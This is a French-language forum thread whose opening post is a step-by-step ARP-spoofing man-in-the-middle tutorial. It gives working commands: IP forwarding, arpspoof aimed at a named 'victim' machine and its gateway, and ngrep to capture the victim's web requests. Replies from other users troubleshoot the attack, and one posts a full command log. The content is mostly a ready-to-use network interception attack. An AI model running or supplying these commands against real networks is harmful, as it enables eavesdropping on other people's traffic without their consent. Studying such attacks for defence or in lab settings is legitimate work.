06-27-2009, 02:00 PM
|
|||
|
|||
[sniffing] local network...
bonjour,
tous dabort ce que nous devons savoir pour y arriver. Notre passerelle/router ADSL est 192.168.0.1 (peut être aussi 192.168.1.1). Notre machine victime est 192.168.0.84 Notre machine sniffeuse est 192.168.0.56 Ensuite il faut activer le forwarding Ipv4. Code:
echo 1 > /proc/sys/net/ipv4/ip_forward Code:
sysctl -w net.ipv4.ip_forward Ensuite il faut ouvrir plusieurs consoles. la premiere pour faire croire à 192.168.0.1 que nous possedons l'interface de 192.168.0.84 Code:
arpspoof -i eth0 -t 192.168.0.1 192.168.0.84 Code:
arpspoof -i eth0 -t 192.168.0.84 192.168.0.1 Code:
ngrep "GET /shearch" "host 192.168.0.84" NOTEZ que arpspoof est ici utilisé avec l'option -t, cela vise une seule machine (donc 192.168.0.84), sans cette option toutes les machines sont visées. NOTEZ également que ce que nous venons de faire avec arpspoof et ngrep peut être fait en une seule commande avec ettercap qui est certe moins polyvalente. Cet article est pris dans un magazine appellé "LINUX-Hors série" que je vous conseille. Voila je vous remerçi de me poster le résultat de vos test de ce tutorial... par avance merci 
Last edited by HKdone; 06-30-2009 at 05:49 AM. 
|
|
06-29-2009, 05:45 PM
|
|||
|
|||
Pb sur ce tuto
Salut HKdone,
Sa m'as l'air d'etre un bon tuto ton post, mais moi j'ai un petit souci avec la 2eme command : # arpspoof -i ath0 192.168.1.1 192.168.1.2 (avec les IPs et interface de mon reseau) et j'obtiens sa : Version: 2.4 Usage: arpspoof [-i interface] [-t target] host je rajoute donc l'option -t avant IP du routeur et là j'ai cette reponse : arpspoof: couldn't arp for host 192.168.1.1 Je me pose donc des questions. Avec ettercap-gui, sa marche sans probleme. A titre d'info j'utilise bt3f sur Eeepc-900. Mon reseau : Routeur :192.168.1.1 Victime :192.168.1.2 Sniff : 192.168.1.3 Jvais continuer de chercher, pour voir ce qui foire. 
|
|
01-25-2010, 10:10 PM
|
|||
|
|||
|
Moi il y a 2 problème le premier ma victime n'a plus accès a internet et le deuxième est que quand je lance ngrep il se lance automatiquement sur eth0 mais moi mon interface est wlan0. j'ai chercher en lisant le manuel mais il ne dise pas comment changer l'interface
|
|
01-26-2010, 12:21 AM
|
||||
|
||||
|
Quote:
|
|
02-05-2010, 10:46 AM
|
|||
|
|||
|
Oui, ça ressemble à "man in the middle", mais la victime n'a plus sa connection... Je m'intéresse à ce tuto car je n'aime pas utiliser une application sans comprendre.
 Mais oui, certaines applications permettent d'arriver au même point sans inconvénients. 
|
|
02-25-2010, 11:31 AM
|
|||
|
|||
|
Bonjour,
pour moi ca ne fonctionne pas je ne reçois aucune information de l'ip victime. Voici ma démarche: Ip victime: 192.168.1.10 Ip du sniff : 192.168.1.12 Ip passerelle: 192.168.1.1 Console1: root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward root@bt:~# arpspoof -i wlan0 -t 192.168.1.1 192.168.1.10 Console2: root@bt:~# arpspoof -i wlan0 -t 192.168.0.10 192.168.1.1 Console3: root@bt:~# ngrep "GET /shearch" "host 192.168.1.10" voila ce que ca m'affiche: wmaster0: noIPv4 adress assigned: cannot assign requested address interface: wmaster0 filter  ip or ip6) and (host 192.168.1.10)match: GET/shearch ############################################## ############################################## ############.... Je génère un peu de traffic de l'ip victime au bout d'un moment je fais ctrl+c puis j'ai: 6844received, 0dropped désolé je suis débutant j'essaie de comprendre.
|
|
02-25-2010, 05:31 PM
|
||||
|
||||
|
c'est quoi ça ?
Code:
root@bt:~# ngrep "GET /shearch" "host 192.168.1.10"
|
 |
| Bookmarks |
| Tags |
| [howto sniffing" |
«
Previous Thread
|
Next Thread
»
| Thread Tools | |
| Display Modes | |
Linear Mode
|
|
All times are GMT. The time now is 03:29 PM.
